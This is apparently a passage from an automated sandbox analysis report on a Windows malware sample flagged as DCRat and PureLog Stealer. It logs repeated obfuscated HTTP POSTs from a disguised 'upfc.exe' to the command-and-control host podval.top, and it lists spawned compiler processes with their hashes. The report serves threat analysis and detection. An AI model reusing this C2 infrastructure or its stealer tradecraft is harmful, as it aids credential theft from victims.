                                                    Data Ascii: ZR_T[ZRXXVUQPXYRUQ^[Q[S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!29$:7Y$ ')=1#=!-[$%-X$#?;X'[ 1?,"['$Y !
                                                    Jul 3, 2024 16:43:50.486464977 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:50.809441090 CEST | 578 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:50 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2B1lWQpWL4KjGKHN%2FFcHg5nrGsnJ8VHu2e3QvHUUGDVuXEQeOTlljFcDMtLFxNDIsI0mJ4Uv0qp5MVdar7zyRndBLocM6zFxdASUqauUmp0FAHIznwUcNXm6oP0U"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6702fa6432b-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    133 | 192.168.2.10 | 49851 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:50.935625076 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:51.291654110 CEST | 1056 | OUT | (request body)
                                                    Jul 3, 2024 16:43:51.382033110 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:51.598347902 CEST | 578 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:51 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uyaGYPr12tFX4jb%2BlLPQvtc%2FYtDJgQJWkv7AC6ButGftONFeQmWFgzONillEFu2hKOF4FwVGvvkLRg4RvvYzOfx1LeyQ2A8pi8ACfMPHSxY5piZExjKUzDQRmeey"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a675df7b8c5d-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    134 | 192.168.2.10 | 49852 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:50.940530062 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:51.291822910 CEST | 1748 | OUT | (request body)
                                                    Jul 3, 2024 16:43:51.406107903 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    135 | 192.168.2.10 | 49853 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:51.761656046 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:52.119642019 CEST | 1060 | OUT | (request body)
                                                    Jul 3, 2024 16:43:52.216464043 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:52.564678907 CEST | 582 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:52 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vFRD%2BRYA%2BBZa9uxIflJAGeYDEZ9mWmBhRaLiUNlU0M8P2o9PsVZqj%2FBcvdN5wO5eBouQjOaRablbTsNvClQielpuFVnuyPRy3iLq%2BPV8vbfIkpIwIwZBD2kkMGrc"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a67b19cc190e-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    136 | 192.168.2.10 | 49854 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:52.689553976 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:53.041673899 CEST | 1060 | OUT | (request body)
                                                    Jul 3, 2024 16:43:53.316390038 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:53.452130079 CEST | 578 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:53 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59URFG21kIlGJdwpJM8CkYexiXdpVYtUxvDuOg0yFd2iXsAUt7ksyrSbLfXvyGudu7%2Fi8y1C3Pt2eUSaQZhCzDh72yT20n7eaSH6znegJG5iHdiT9ke19YSoB%2Fm8"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a68178748ca1-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    137 | 192.168.2.10 | 49855 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:53.579931974 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:53.932243109 CEST | 1060 | OUT | (request body)
                                                    Jul 3, 2024 16:43:54.030610085 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:54.397219896 CEST | 582 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:54 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Dp0Uh81XrqQidz%2BizYLHCg%2FoKbTLhJEJ3D13vCFG3oCPP3TwVSM5CYZthVj4tXyeY0o%2FcPA7rcSsb8yB%2BouwnyTyyDAl577iWnjCXU0H34OMtoImSK4egBJYQQm"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a68669cb4285-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    138 | 192.168.2.10 | 49856 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:54.540582895 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1048
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:54.886837006 CEST | 1048 | OUT | (request body)
                                                    Jul 3, 2024 16:43:55.028476000 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    139 | 192.168.2.10 | 49857 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:56.613468885 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:56.964407921 CEST | 1772 | OUT | (request body)
                                                    Jul 3, 2024 16:43:57.068679094 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:57.282243967 CEST | 725 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:57 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mmo95KsdU%2BfEgGGPI792vASBcfSUNsnJ6GiiDl9QJqrNX4MdlUJJy76qAJLYf9J49slXevBxKxFtWbMMfmW3ihEIzX6ZtxPrCRtChMaJiv839jzf7XRcChbMQxJe"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6996d9619ef-EWR
                                                    alt-svc: h2=":443"; ma=60


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    140 | 192.168.2.10 | 49858 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:56.806241989 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:57.151961088 CEST | 1060 | OUT | (request body)
                                                    Jul 3, 2024 16:43:57.269869089 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:57.612257004 CEST | 586 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:57 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XN9Ai9h%2B3rMd3BRKar9IpML4rwxAC%2FXl3g3uWp2kYWfBOVEMoSUDyu%2BelNi96UY4wb7IgfC%2Blx%2BowFeB1OI6U8dEWGFPey%2BDPxzKnVWfWMrioHrdH3oCUEVjpowd"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a69aabc61791-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    141 | 192.168.2.10 | 49859 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:57.733705044 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1048
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:58.089350939 CEST | 1048 | OUT | (request body)
                                                    Jul 3, 2024 16:43:58.179328918 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:58.421811104 CEST | 584 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:58 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FYRYXs6Gr%2FuYi1ShUKnGuPrRpQZXHsYpHUoIUUH39oBPTI090t36yhDI%2BDApfLxGAaS6Ampuvee9MMirx8PTt%2B3KeQZNamBwZVRxUK0eGFm7qj%2BuE0%2BivvXwj9Sk"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6a05ef78c8d-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    142 | 192.168.2.10 | 49860 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:58.545974970 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:58.901098013 CEST | 1060 | OUT | (request body)
                                                    Jul 3, 2024 16:43:59.023895979 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:59.374684095 CEST | 582 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:59 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5gGJ3%2B%2BoSPUnDnv9qkibguIs1aCood%2BBaWZisfDByEW5BuRPfeA7tUpCtJlOAFJBUA069xLg0VB9kWqK7jVHZJhNLGHqQLBoLhhaBGhJrb%2BPQ4ppYOmFKOzDTPJ0"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6a59d2e43f8-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    143 | 192.168.2.10 | 49861 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:59.512029886 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:59.869689941 CEST | 1060 | OUT | (request body)
                                                    Jul 3, 2024 16:43:59.967328072 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:00.180957079 CEST | 582 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BkioH0D26tpgEBTYOOKf%2FRkzZeg%2Bz%2Fhpbq7GHCRll2GC7ht5bJGBtPPpVb9rVpqmiXeRVlFK4GEv77iTiUBXC7VNaPxtVlztfMMefDt8NRAkcoZu3n6msfijdX2l"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6ab89be1a44-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    144 | 192.168.2.10 | 49862 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:44:00.323920012 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:44:00.682584047 CEST | 1060 | OUT | Data Raw: 5f 54 5f 54 5e 5f 52 5d 58 56 55 51 50 5b 59 51 55 5c 5e 58 51 58 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_T^_R]XVUQP[YQU\^XQXSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"2$^33 >-V#=)Y:]&5Y$?V;X4"1([-<"['$Y -
                                                    Jul 3, 2024 16:44:00.843276024 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:01.087047100 CEST | 582 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZgNqQ39dN6REcW9%2FSICOT6xVO4zs%2B1UKKvdr057osd2cRGOz6jNnE1ng33shekr9gO2msXVG2ZB0neGISPX%2FIUmcuvIIgZYDHqXfl%2Fanczs4fKQy7CHQbEAhD6U9"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6b0dac943be-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID:145
                                                    Source IP:192.168.2.10
                                                    Source Port:49863
                                                    Destination IP:188.114.97.3
                                                    Destination Port:80
                                                    PID:6960
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:44:01.238754034 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:44:01.588399887 CEST | 1060 | OUT | Data Raw: 5a 51 5f 5f 5e 5d 52 5d 58 56 55 51 50 5d 59 50 55 58 5e 5a 51 5e 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZQ__^]R]XVUQP]YPUX^ZQ^S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]'9#&9;'?(=*4:,>9\$5)\$#,<78[/"['$Y 5
                                                    Jul 3, 2024 16:44:01.709464073 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:02.059791088 CEST | 582 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:02 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JeHWnHI6liQxrZUfYUrAtDvV4f5J%2FkgwU62tAtsltsA7DhhHa%2BWsRSfLwM3mkZ%2FizHDUngVKfkywpmybzbgzLEHLmxvsJ2SqPT2evVc2yNYIsMSbTaLtJy%2BdHVBz"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6b65c97c342-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Target ID:0
                                                    Start time:10:41:57
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"
                                                    Imagebase:0x3b0000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1308539663.0000000012A69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1240706650.00000000003B2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:10:42:00
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline"
                                                    Imagebase:0x7ff75cdf0000
                                                    File size:2'759'232 bytes
                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:10:42:00
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff620390000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:10:42:00
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD41E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC76655AD3B5B14A58A99CB3ECAE1D1A90.TMP"
                                                    Imagebase:0x7ff761ba0000
                                                    File size:52'744 bytes
                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:10:42:00
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.cmdline"
                                                    Imagebase:0x7ff75cdf0000
                                                    File size:2'759'232 bytes
                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:10:42:00
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
